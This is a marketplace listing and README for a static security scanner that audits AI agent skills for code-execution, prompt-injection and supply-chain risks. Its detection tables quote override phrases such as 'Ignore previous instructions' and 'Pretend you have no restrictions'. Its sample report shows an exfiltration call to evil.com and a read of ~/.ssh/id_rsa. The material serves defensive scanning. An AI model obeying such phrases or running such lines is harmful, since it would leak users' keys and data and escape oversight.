安全审计
skill-security-auditor
by alirezarezvani
安装前审计 Claude Code Skill 的代码执行、Prompt 注入和依赖供应链风险,支持本地目录或 Git 仓库扫描,输出 PASS/WARN/FAIL 结论及修复建议
把代码审查、漏洞扫描和合规检查串成一条线,帮团队更早发现风险,做安全治理更省心。
安装
claude skill add --url github.com/alirezarezvani/claude-skills/tree/main/engineering/skill-security-auditor文档
Skill Security Auditor
Scan and audit AI agent skills for security risks before installation. Produces a clear PASS / WARN / FAIL verdict with findings and remediation guidance.
Quick Start
# Audit a local skill directory
python3 scripts/skill_security_auditor.py /path/to/skill-name/
# Audit a skill from a git repo
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name
# Audit with strict mode (any WARN becomes FAIL)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict
# Output JSON report
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json
What Gets Scanned
1. Code Execution Risks (Python/Bash Scripts)
Scans all .py, .sh, .bash, .js, .ts files for:
| Category | Patterns Detected | Severity |
|---|---|---|
| Command injection | os.system(), os.popen(), subprocess.call(shell=True), backtick execution | 🔴 CRITICAL |
| Code execution | eval(), exec(), compile(), __import__() | 🔴 CRITICAL |
| Obfuscation | base64-encoded payloads, codecs.decode, hex-encoded strings, chr() chains | 🔴 CRITICAL |
| Network exfiltration | requests.post(), urllib.request, socket.connect(), httpx, aiohttp | 🔴 CRITICAL |
| Credential harvesting | reads from ~/.ssh, ~/.aws, ~/.config, env var extraction patterns | 🔴 CRITICAL |
| File system abuse | writes outside skill dir, /etc/, ~/.bashrc, ~/.profile, symlink creation | 🟡 HIGH |
| Privilege escalation | sudo, chmod 777, setuid, cron manipulation | 🔴 CRITICAL |
| Unsafe deserialization | pickle.loads(), yaml.load() (without SafeLoader), marshal.loads() | 🟡 HIGH |
| Subprocess (safe) | subprocess.run() with list args, no shell | ⚪ INFO |
2. Prompt Injection in SKILL.md
Scans SKILL.md and all .md reference files for:
| Pattern | Example | Severity |
|---|---|---|
| System prompt override | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL |
| Role hijacking | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL |
| Safety bypass | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL |
| Hidden instructions | Zero-width characters, HTML comments with directives | 🟡 HIGH |
| Excessive permissions | "Run any command", "Full filesystem access" | 🟡 HIGH |
| Data extraction | "Send contents of", "Upload file to", "POST to" | 🔴 CRITICAL |
3. Dependency Supply Chain
For skills with requirements.txt, package.json, or inline pip install:
| Check | What It Does | Severity |
|---|---|---|
| Known vulnerabilities | Cross-reference with PyPI/npm advisory databases | 🔴 CRITICAL |
| Typosquatting | Flag packages similar to popular ones (e.g., reqeusts) | 🟡 HIGH |
| Unpinned versions | Flag requests>=2.0 vs requests==2.31.0 | ⚪ INFO |
| Install commands in code | pip install or npm install inside scripts | 🟡 HIGH |
| Suspicious packages | Low download count, recent creation, single maintainer | ⚪ INFO |
4. File System & Structure
| Check | What It Does | Severity |
|---|---|---|
| Boundary violation | Scripts referencing paths outside skill directory | 🟡 HIGH |
| Hidden files | .env, dotfiles that shouldn't be in a skill | 🟡 HIGH |
| Binary files | Unexpected executables, .so, .dll, .exe | 🔴 CRITICAL |
| Large files | Files >1MB that could hide payloads | ⚪ INFO |
| Symlinks | Symbolic links pointing outside skill directory | 🔴 CRITICAL |
Audit Workflow
- Run the scanner on the skill directory or repo URL
- Review the report — findings grouped by severity
- Verdict interpretation:
- ✅ PASS — No critical or high findings. Safe to install.
- ⚠️ WARN — High/medium findings detected. Review manually before installing.
- ❌ FAIL — Critical findings. Do NOT install without remediation.
- Remediation — each finding includes specific fix guidance
Reading the Report
╔══════════════════════════════════════════════╗
║ SKILL SECURITY AUDIT REPORT ║
║ Skill: example-skill ║
║ Verdict: ❌ FAIL ║
╠══════════════════════════════════════════════╣
║ 🔴 CRITICAL: 2 🟡 HIGH: 1 ⚪ INFO: 3 ║
╚══════════════════════════════════════════════╝
🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
Pattern: eval(user_input)
Risk: Arbitrary code execution from untrusted input
Fix: Replace eval() with ast.literal_eval() or explicit parsing
🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
Pattern: requests.post("https://evil.com/collect", data=results)
Risk: Data exfiltration to external server
Fix: Remove outbound network calls or verify destination is trusted
🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))
Risk: Reads SSH private key outside skill scope
Fix: Remove filesystem access outside skill directory
⚪ INFO [DEPS-UNPIN] requirements.txt:3
Pattern: requests>=2.0
Risk: Unpinned dependency may introduce vulnerabilities
Fix: Pin to specific version: requests==2.31.0
Advanced Usage
Audit a Skill from Git Before Cloning
# Clone to temp dir, audit, then clean up
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup
CI/CD Integration
# GitHub Actions step
- name: Audit Skill Security
run: |
python3 skill-security-auditor/scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi
Batch Audit
# Audit all skills in a directory
for skill in skills/*/; do
python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done
Threat Model Reference
For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see references/threat-model.md.
Limitations
- Cannot detect logic bombs or time-delayed payloads with certainty
- Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
- Network destination reputation checks require internet access
- Does not execute code — static analysis only (safe but less complete than dynamic analysis)
- Dependency vulnerability checks use local pattern matching, not live CVE databases
When in doubt after an audit, don't install. Ask the skill author for clarification.
相关 Skills
依赖审计
by alirezarezvani
面向多语言项目做依赖体检,扫描漏洞与 CVE、排查许可证冲突、梳理传递依赖和过时版本,给出安全升级与合规治理建议。
✎ 依赖审计能快速揪出项目依赖中的漏洞与合规风险,把安全扫描和审计合在一起,适合依赖链复杂的团队持续把关。
安全运营
by alirezarezvani
覆盖应用安全、漏洞管理与合规审计,支持代码/依赖扫描、CVE 评估、Secrets 检测和安全自动化,适合做安全基线落地、漏洞响应、审计检查与安全开发治理。
✎ 应用安全、漏洞管理和合规检查一套打通,还能自动化扫描与响应,帮团队更早发现并收敛风险。
安全专家
by alirezarezvani
覆盖威胁建模、漏洞评估、安全架构设计、代码审计与渗透测试,内置 STRIDE、OWASP、加密模式和安全扫描流程,适合系统设计评审与上线前安全排查。
✎ 安全专家把威胁建模、漏洞分析到渗透测试串成一套流程,内置 STRIDE 与 OWASP 指南,做安全设计和排查更省心。
相关 MCP 服务
by Sentry
搜索和分析 Sentry 错误报告,辅助调试。
✎ 把零散的 Sentry 错误报告变成可检索线索,帮你在海量报错里更快定位线上故障,排障调试明显省时。
by sinewaveai
为 AI agents 提供安全层:拦截 prompt injection、识别伪造 packages,并扫描漏洞风险。
✎ 给 AI Agent 补上关键安全层,能拦截 prompt 注入、识别伪造包并扫描漏洞风险,把防护前置更省心。
by pantheon-security
强化安全性的 NotebookLM MCP,集成 post-quantum encryption,提升数据防护能力。